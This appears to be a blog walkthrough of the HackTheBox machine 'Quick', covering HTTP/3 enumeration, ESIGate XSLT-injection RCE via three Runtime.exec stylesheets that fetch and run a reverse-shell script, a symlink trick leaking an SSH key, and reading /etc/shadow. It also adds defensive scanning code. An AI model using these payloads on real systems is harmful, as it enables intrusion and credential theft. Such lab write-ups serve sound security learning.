HackTheBox Quick Writeup

Hello and welcome back to my HackTheBox Writeup and Walkthrough series. In this writeup we look at the latest Linux machine, Quick. The machine's difficulty is categorized as HARD and obviously it is designed by MrR3boot.


As always, I update my hosts file with machine IP as quick.htb and proceed to a quick nmap services scan.

Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-30 19:16 +03
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Scanning 9 services on quick.htb (
Service scan Timing: About 33.33% done; ETC: 19:35 (0:01:38 remaining)
Completed Service scan at 19:34, 102.57s elapsed (9 services on 1 host)
Initiating OS detection (try #1) against quick.htb (
Retrying OS detection (try #2) against quick.htb (
Retrying OS detection (try #3) against quick.htb (
Retrying OS detection (try #4) against quick.htb (
Retrying OS detection (try #5) against quick.htb (
Initiating Traceroute at 19:34
Stats: 0:18:39 elapsed; 0 hosts completed (1 up), 1 undergoing Traceroute
Traceroute Timing: About 32.26% done; ETC: 19:34 (0:00:00 remaining)
Completed Traceroute at 19:35, 0.14s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 19:35
Completed Parallel DNS resolution of 2 hosts. at 19:35, 0.20s elapsed
NSE: Script scanning
Initiating NSE at 19:35
Completed NSE at 19:35, 16.98s elapsed
Initiating NSE at 19:35
Completed NSE at 19:36, 60.30s elapsed
Initiating NSE at 19:36
Completed NSE at 19:36, 0.00s elapsed
Nmap scan report for quick.htb (
Host is up (0.12s latency).
Not shown: 1991 closed ports
22/tcp    open          ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 fb:b0:61:82:39:50:4b:21:a8:62:98:4c:9c:38:82:70 (RSA)
|   256 ee:bb:4b:72:63:17:10:ee:08:ff:e5:86:71:fe:8f:80 (ECDSA)
|_  256 80:a6:c2:73:41:f0:35:4e:5f:61:a7:6a:50:ea:b8:2e (ED25519)
9001/tcp  open          http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Quick | Broadband Services
443/udp   open|filtered https
16912/udp open|filtered unknown
18991/udp open|filtered unknown
19625/udp open|filtered unknown
26415/udp open|filtered unknown
30704/udp open|filtered unknown
37212/udp open|filtered unknown
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Uptime guess: 45.117 days (since Mon Mar 16 16:48:28 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
1   133.72 ms
2   133.81 ms quick.htb (

The Nmap results show a number of open ports. A web service is running on port 9001. Hitting port 9001 from the browser, I noticed a website “Quick | Broadband Services” running. UDP port 443 is open, but the other 6 ports are filtered.

Upon enumerating the website I found following links:

  • http://quick.htb:9001/login.php – A Ticketing System Login Page
  • https://portal.quick.htb/ – A portal that is supposed to be the new page the company is migrating to and that supports TLS and HTTP; however, the page doesn’t open. I add this VHost to my hosts file.
  • http://quick.htb:9001/clients.php – A list of clients, nothing interesting, however could be useful in the later stages.
  • I also found some names on the home page that are possibly useful for authenticating to the ticketing system found earlier.


I decided to run Dirbuster first and, if it didn’t come up with satisfying results, to run other fuzzing tools. After a few minutes of running, and before it died of the intolerable errors the box was throwing, Dirbuster showed the following files:

# root @ ns09 in ~/htb/quick [16:24:15] 
$ dirbuster 
Starting OWASP DirBuster 1.0-RC1
Starting dir/file list based brute forcing
File found: /index.php - 200
File found: /search.php - 200
File found: /home.php - 200
File found: /login.php - 200
File found: /clients.php - 200
File found: /db.php - 200
File found: /television.php - 502
File found: /icons/small/pipermail.php - 502
File found: /icons/OasDefault.php - 502
File found: /pa.php - 502
File found: /banner1.php - 502
File found: /preview/gallery.php - 502
File found: /icons/W.php - 502
File found: /tp.php - 502
File found: /icons/small/frontpage.php - 502
File found: /preview/html/28.php - 502

Hypertext Transfer Protocol (HTTP) over QUIC

No hints at this stage. I tried a couple of things, like SQLi, but nothing worked. After looking back at the Nmap results, I realized that I had missed UDP port 443, which shows as filtered HTTPS. After another round of quick Google searching, I landed on a forum post in the Sophos Community about a protocol called “QUIC”, which is also pronounced “Quick” – oh, yeah… the machine name is “Quick” as well :). QUIC is a brand-new transport layer protocol developed by Google in 2012. After a further search I understood that the machine uses HTTP/3, hence that part of the website isn’t available for normal browsing.


So now everything is clear. I found a git repository by Cloudflare on GitHub and realized that I must install the Rust programming language and Cargo book in order to proceed. Once the dependencies and the complete package are installed on my Kali, I can access the pages that use the HTTP/3 protocol. However, I wasn’t able to render the web page in my browser, but I can read the contents directly from my terminal using – like cURL.


As I was installing Quiche for the first time, it was a really painstaking task. It took a lot of time, as there are multiple dependencies and packages that need to be installed before the tool works properly. Meanwhile, I started to read a few blog posts to understand how it works.

So finally everything is in place:

# root @ ns09 in ~/quiche on git:master o [1:37:10] C:101
$ cargo run --manifest-path=tools/apps/Cargo.toml --bin quiche-client -- --no-verify https:/quick.htb/
   Compiling quiche v0.3.0 (/root/quiche)
   Compiling url v1.7.2
   Compiling syn v1.0.18
   Compiling mio v0.6.21
   Compiling regex v1.3.7
   Compiling serde_derive v1.0.106
   Compiling serde_with_macros v1.1.0
   Compiling env_logger v0.6.2
   Compiling serde v1.0.106
   Compiling serde_json v1.0.52
   Compiling serde_with v1.4.0
   Compiling docopt v1.1.0
   Compiling qlog v0.2.0 (/root/quiche/tools/qlog)
   Compiling quiche_apps v0.1.0 (/root/quiche/tools/apps)
    Finished dev [unoptimized + debuginfo] target(s) in 3m 41s
# root @ ns09 in ~/quiche on git:master x [2:20:32] 

Now I can read the vHost http://portal.quick.htb/ and its contents using Quiche, which is supposed to be running on HTTPS over UDP.

Command To Run The Client:

cargo run --manifest-path=tools/apps/Cargo.toml --bin quiche-client -- https://quic.tech:8443/

Accessing Index Page:

$ cargo run --manifest-path=tools/apps/Cargo.toml --bin quiche-client -- --no-verify https:/quick.htb:443/
    Finished dev [unoptimized + debuginfo] target(s) in 0.40s
     Running `tools/apps/target/debug/quiche-client --no-verify 'https:/quick.htb/'`

<title> Quick | Customer Portal</title>
<h1>Quick | Portal</h1>
ul {
  list-style-type: none;
  margin: 0;
  padding: 0;
  width: 200px;
  background-color: #f1f1f1;

li a {
  display: block;
  color: #000;
  padding: 8px 16px;
  text-decoration: none;

/* Change the link color on hover */
li a:hover {
  background-color: #555;
  color: white;
<p> Welcome to Quick User Portal</p>
  <li><a href="index.php">Home</a></li>
  <li><a href="index.php?view=contact">Contact</a></li>
  <li><a href="index.php?view=about">About</a></li>
  <li><a href="index.php?view=docs">References</a></li>

Quick References Page:

# root @ ns09 in ~/quiche on git:master x [2:23:50] 
$ cargo run --manifest-path=tools/apps/Cargo.toml --bin quiche-client -- --no-verify https:/quick.htb/index.php\?view\=docs
    Finished dev [unoptimized + debuginfo] target(s) in 0.44s
     Running `tools/apps/target/debug/quiche-client --no-verify 'https:/quick.htb/index.php?view=docs'`
<!DOCTYPE html>
<meta name="viewport" content="width=device-width, initial-scale=1">

<h1>Quick | References</h1>
  <li><a href="docs/QuickStart.pdf">Quick-Start Guide</a></li>
  <li><a href="docs/Connectivity.pdf">Connectivity Guide</a></li>

Contents From About Us Page:

<div class="about-section">
  <h1>Quick | About Us </h1>

<h2 style="text-align:center">Our Team</h2>
<div class="row">
  <div class="column">
    <div class="card">
      <img src="/w3images/team1.jpg" alt="Jane" style="width:100%">
      <div class="container">
        <h2>Jane Doe</h2>
        <p class="title">CEO & Founder</p>
        <p>Quick Broadband services established in 2012 by Jane.</p>

  <div class="column">
    <div class="card">
      <img src="/w3images/team2.jpg" alt="Mike" style="width:100%">
      <div class="container">
        <h2>Mike Ross</h2>
        <p class="title">Sales Manager</p>
        <p>Manages the sales and services.</p>
  <div class="column">
    <div class="card">
      <img src="/w3images/team3.jpg" alt="John" style="width:100%">
      <div class="container">
        <h2>John Doe</h2>
        <p class="title">Web Designer</p>
        <p>Front end developer.</p>

Downloading PDFs Found In The References Page

# root @ ns09 in ~/quiche on git:master x [12:28:05] 
$ cargo run --manifest-path=tools/apps/Cargo.toml --bin quiche-client -- --no-verify https:/quick.htb/docs/Connectivity.pdf >> Connectivity.pdf
    Finished dev [unoptimized + debuginfo] target(s) in 0.44s
     Running `tools/apps/target/debug/quiche-client --no-verify 'https:/quick.htb/docs/Connectivity.pdf'`

# root @ ns09 in ~/quiche on git:master x [12:28:14] 
$ cargo run --manifest-path=tools/apps/Cargo.toml --bin quiche-client -- --no-verify https:/quick.htb/docs/QuickStart.pdf >> QuickStart.pdf    
    Finished dev [unoptimized + debuginfo] target(s) in 0.42s
     Running `tools/apps/target/debug/quiche-client --no-verify 'https:/quick.htb/docs/QuickStart.pdf'`

# root @ ns09 in ~/quiche on git:master x [12:28:56] 
$ ls -la
total 9440
drwxr-xr-x  12 root root    4096 May  1 12:27 .
drwxr-xr-x 149 root root   16384 May  1 12:29 ..
-rw-r--r--   1 root root  251490 May  1 12:27 Connectivity.pdf
-rw-r--r--   1 root root       0 May  1 12:27 QuickStart.pdf

The Connectivity PDF is a guide that shows how to connect to the service. It reads as follows:

As the guide states, I need a registered email ID and the listed password in order to connect. I have the password, but I need to find the email IDs. So I proceeded to scrape all possible email IDs and domain names from the website to make a wordlist. I scraped from the pages visible at http://quick.htb:9001 and from the other pages.


Once the list was ready, I ran WFUZZ with the wordlist as payload and the possible matching password. Within a couple of seconds WFUZZ returned the right match and I successfully logged in to the Ticketing System.

I raised a test ticket and was given a number; I was able to search for this number and see the status from the home page.

The page doesn’t reveal what Ticketing System it is running on, but I know that using Burp I could see the HTTP headers, which should have the required information.

Well, the application is running on ESIGate – a well-known web accelerator and web app integration tool.

Exploiting ESIGate

Another round of quick Google searching showed a couple of exploits. The PoCs confirm that ESIGate is vulnerable to XSLT injection and that Remote Code Execution (RCE) is possible (CVE-2018-1000854).

CVE-2018-1000854 In Details:

esigate.org ESIGate version 5.2 and earlier contains a CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component (‘Injection’) vulnerability in ESI directive with user specified XSLT that can result in Remote Code Execution. This attack appear to be exploitable via Use of another weakness in backend application to reflect ESI directives. This vulnerability appears to have been fixed in 5.3.
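The advisory depends on a backend weakness that reflects ESI directives from user input. The following is an added defensive example (not code from this writeup or from ESIGate): it scans a submitted form body for ESI tags, lists the external hosts they reference, and shows the output-escaping that stops a reflected value from reaching the ESI processor as markup. The form field names and the sample request are constructed for illustration.

```python
import html
import re
from urllib.parse import parse_qsl, urlencode, urlsplit

# Opening ESI tags only; a closing </esi:...> tag carries no attributes.
ESI_TAG = re.compile(r"<\s*esi:([a-z]+)\b([^>]*)>", re.IGNORECASE)
ATTR = re.compile(r"""([\w:-]+)\s*=\s*(?:"([^"]*)"|'([^']*)')""")


def _host(url):
    """Hostname of a URL-valued attribute, or None if it is not a URL."""
    try:
        host = urlsplit(url.strip()).hostname
    except ValueError:  # malformed URL, e.g. an unterminated IPv6 literal
        return None
    return host.lower() if host else None


def scan_form_body(body, allowed_hosts=frozenset()):
    """Return one finding per ESI tag found in any field of a form body."""
    findings = []
    for field, value in parse_qsl(body, keep_blank_values=True):
        for tag in ESI_TAG.finditer(value):
            external = []
            for attr in ATTR.finditer(tag.group(2)):
                raw = attr.group(2) if attr.group(2) is not None else attr.group(3)
                host = _host(raw)
                if host and host not in allowed_hosts:
                    external.append((attr.group(1).lower(), host))
            findings.append(
                {"field": field, "tag": tag.group(1).lower(), "external": external}
            )
    return findings


def neutralize(value):
    """Escape markup so a reflected value is served as text, not as a tag."""
    return html.escape(value, quote=True)


# Constructed sample request. Field names (title, msg, id) are hypothetical
# and 198.51.100.7 is a documentation address, not a host from the writeup.
SAMPLE_FIELDS = {
    "title": "REQUEST1",
    "msg": '<esi:include src="http://198.51.100.7/a.xml" '
           'stylesheet="http://198.51.100.7/a.xsl"></esi:include>',
    "id": "TKT-1111",
}
SAMPLE_BODY = urlencode(SAMPLE_FIELDS)

if __name__ == "__main__":
    for finding in scan_form_body(SAMPLE_BODY):
        print(finding)
    print(neutralize(SAMPLE_FIELDS["msg"]))
```

Escaping at output time addresses the reflection; the XSLT code execution itself is fixed in ESIGate 5.3 according to the advisory text above.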

After reading a couple of PoCs, this blog post shows how the exploit can be done. The attack goes like this: the attacker must be able to reflect a value with XML tags inside a page that is cached. Once a reflected value is found on the site, the following payload is reflected by the attacker in the HTTP response.

My plan is to create multiple tickets, intercepting each request using Burp and uploading a malicious XSL (Extensible Stylesheet Language) stylesheet with my payload injected into it. For each ticket, the XSL I deliver will have a different command to execute. When the associated ticket is searched for from the Search Ticket bar, the application will execute the XSL and run the payload in it.

  1. Import the Remote Shell Script
  2. Assign the execution permission
  3. Run the reverse shell

I made 3 XSL files using EditPlus on my Windows host and moved them to the working directory for Quick on my Kali machine.

NS1.xsl – Import the RS.SH

<?xml version="1.0" ?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="xml" omit-xml-declaration="yes"/>
<xsl:template match="/" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime">
<xsl:variable name="cmd"><![CDATA[wget]]></xsl:variable>
<xsl:variable name="rtObj" select="rt:getRuntime()"/>
<xsl:variable name="process" select="rt:exec($rtObj, $cmd)"/> Process: <xsl:value-of select="$process"/> Command: <xsl:value-of select="$cmd"/> 

NS2.xsl – Assign the execution permission

<?xml version="1.0" ?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="xml" omit-xml-declaration="yes"/>
<xsl:template match="/" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime">
<xsl:variable name="cmd"><![CDATA[chmod +x rs.sh]]></xsl:variable>
<xsl:variable name="rtObj" select="rt:getRuntime()"/>
<xsl:variable name="process" select="rt:exec($rtObj, $cmd)"/> Process: <xsl:value-of select="$process"/> Command: <xsl:value-of select="$cmd"/> 

NS3.xsl – Run the reverse shell script

<?xml version="1.0" ?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="xml" omit-xml-declaration="yes"/>
<xsl:template match="/" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime">
<xsl:variable name="cmd"><![CDATA[./rs.sh -e /bin/bash 9999]]></xsl:variable>
<xsl:variable name="rtObj" select="rt:getRuntime()"/>
<xsl:variable name="process" select="rt:exec($rtObj, $cmd)"/> Process: <xsl:value-of select="$process"/> Command: <xsl:value-of select="$cmd"/> 

Running Python Simple HTTPServer and Listener



The request below is as simple as it looks. It creates a ticket with REQUEST“X” and a message including the custom external XML link and the external XSL stylesheet link. The payloads end with my own ticket number, which forces the application to generate it. Each custom payload executes when I search for the tickets one by one, in order.

Payloads for each request:


Request 1

Request 2

Request 3

Executing The Payloads – Request1 associated with ticket #1111 – Importing rs.sh script.

Executing Request1 imports the reverse shell script. This can be triggered directly from the search button or from the browser link. When I hit enter, the command below executes the script included in the REQUEST1 I sent. This initiates a WGET command to import the hosted rs.sh (reverse shell bash script) from my Python SimpleHTTPServer. I can see the server was hit by a GET request from

Command: http://quick.htb:9001/search.php?search=TKT-1111

Executing The Payloads – Request2 associated with ticket #2222 – Execute permission to rs.sh script.

Command: http://quick.htb:9001/search.php?search=TKT-2222

This request assigned execution permission to my rs.sh script. This will allow me to run the script in the 3rd step.

Executing The Payloads – Request3 associated with ticket #3333 – Execute the rs.sh script.

Command: http://quick.htb:9001/search.php?search=TKT-3333

When I run this command, the payload in the 3rd request gets executed, the bash script runs, and the listener on the assigned port gets the reverse shell as SAM.

As soon as I run the 3rd command from the browser I got the connection back in my listener as SAM. The user.txt was found in the SAM’s desktop and I immediately obtained it.

Privilege Escalation

So things were bad earlier, and they will go a bit smoother from now onwards. I believe user was the longest process I have ever encountered on HTB; however, it was fun and I learned a lot of new things. I must thank the creator.

MySQL Database Dump

Manual enumeration led me through different folders. In the printers folder I found a PHP file (index.php), possibly a DB connector, where I found the following:

And after another couple of hours without any success, I found the following in the Apache2 directory: a new vHost, “printer2.quick.htb”.

I started to enumerate the box for more hints, and while I was in the WWW folder I noticed the db.php file. If I recall correctly, I had found this file with WFUZZ in the initial enumeration, so I decided to look at it.

This file has the MySQL database connection settings with clear-text local user credentials. However, I wasn’t able to connect to it from my Kali, so I decided to connect locally as user SAM.

After trying to connect to MySQL and failing each time, I was finally able to connect to the MySQL database.

And I was finally able to read the 2 users and their password hashes.

I tried to crack the hash using different mediums but unfortunately couldn’t do it. After long research and looking for help in different forums, I found a PHP MD5 Decrypt script on GitHub. However, it doesn’t work out of the box; I had to make several amendments and changes. After working on it for an hour, I finally made a script that cracked the Server Admin password hash. The script is not complete, as I get errors every time I run it, but it gives a result 🙂

I finally have the password: yl51pbx

All my hard work so far didn’t help much: I wasn’t able to use the password I had just cracked. So I had to move forward and find other possibilities.


A friend on Discord told me that, as printer2.quick.htb runs on localhost, I needed to SSH to localhost and port 80 and try. I immediately found a way to do it, and within the next few minutes I was able to see the printer’s login page locally. As we were discussing, we found the option to add a new printer that accepts a custom port. Another friend of his also suggested that, since user SAM has full read and write access to the directory /var/www/jobs, the plan should be to create a symbolic link. The link will pull the SRV Admin private key when it is clicked.

I create the file and add the new printer with my netcat listening port. Then, from assign job, I initiate the job I just created as a symlink.

Adding New Printer

As soon as I access the link http://printerv2.quick.htb/job.php and click on Print, my listener is activated and I have the private key of the user SRVADM. This key will allow me to SSH to the box as


I added the private key to my SSH and managed to log in to the system as ServerAdmin.
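The weakness used above is a job directory writable by one user and read by a process running as another, which follows whatever the directory entry points to. The following is an added example (not the box's code; the function name and size limit are assumptions) of how the reading side can refuse symlinks and other non-regular entries before sending a job anywhere.

```python
import os
import stat


class JobRejected(Exception):
    """The spool entry is not a plain file this service is willing to read."""


def read_job(spool_dir, name, max_bytes=1 << 20):
    """Read a job file from spool_dir without following links.

    Hypothetical helper: `name` must be a bare file name, so the only path
    component an unprivileged writer controls is the final one.
    """
    if name in ("", ".", "..") or "\x00" in name or os.path.basename(name) != name:
        raise JobRejected("job name must be a plain file name")

    dir_fd = os.open(spool_dir, os.O_RDONLY | os.O_DIRECTORY)
    try:
        try:
            # O_NOFOLLOW fails on a symlink in the final component;
            # O_NONBLOCK keeps a planted FIFO from hanging the service.
            fd = os.open(
                name, os.O_RDONLY | os.O_NOFOLLOW | os.O_NONBLOCK, dir_fd=dir_fd
            )
        except OSError as exc:
            raise JobRejected(f"cannot open {name!r}: {exc.strerror}") from exc

        with os.fdopen(fd, "rb") as handle:
            # Check the object actually opened, not the path, to avoid a race.
            info = os.fstat(handle.fileno())
            if not stat.S_ISREG(info.st_mode):
                raise JobRejected("not a regular file")
            if info.st_nlink != 1:
                raise JobRejected("hard-linked file")
            if info.st_size > max_bytes:
                raise JobRejected("job too large")
            return handle.read(max_bytes)
    finally:
        os.close(dir_fd)


if __name__ == "__main__":
    import tempfile

    # Constructed demo: one ordinary job and one symlink to a file outside.
    root = tempfile.mkdtemp()
    spool = os.path.join(root, "jobs")
    os.mkdir(spool)
    outside = os.path.join(root, "outside.txt")
    with open(outside, "w") as fh:
        fh.write("not a job")
    with open(os.path.join(spool, "job1"), "w") as fh:
        fh.write("hello printer")
    os.symlink(outside, os.path.join(spool, "job2"))

    print(read_job(spool, "job1"))
    try:
        read_job(spool, "job2")
    except JobRejected as exc:
        print("rejected:", exc)
```

Removing write access to the job directory for accounts that should not submit jobs addresses the same problem from the other side.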

After a little enumeration I found the file printers.conf (srvadm@quick:~/.cache/conf.d$ cat printers.conf); I read the file and found another set of credentials.



Obtaining Root.txt

And I used the password just obtained to su to root and grab the root.txt.

That’s all, what a ride. I definitely enjoyed this machine and learned a lot of new things, all thanks to MrR3boot and a couple of mates who helped me all the way. We learn together and we hack together. Thanks for dropping by and reading my article. Come back soon.

root@quick:/# cat etc/shadow
root@quick:/# ^C


Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n

7 months ago

on request1 you mentioned that it’s used to import the nc.exe. but later you mentioned that you use the request1 to import your .sh
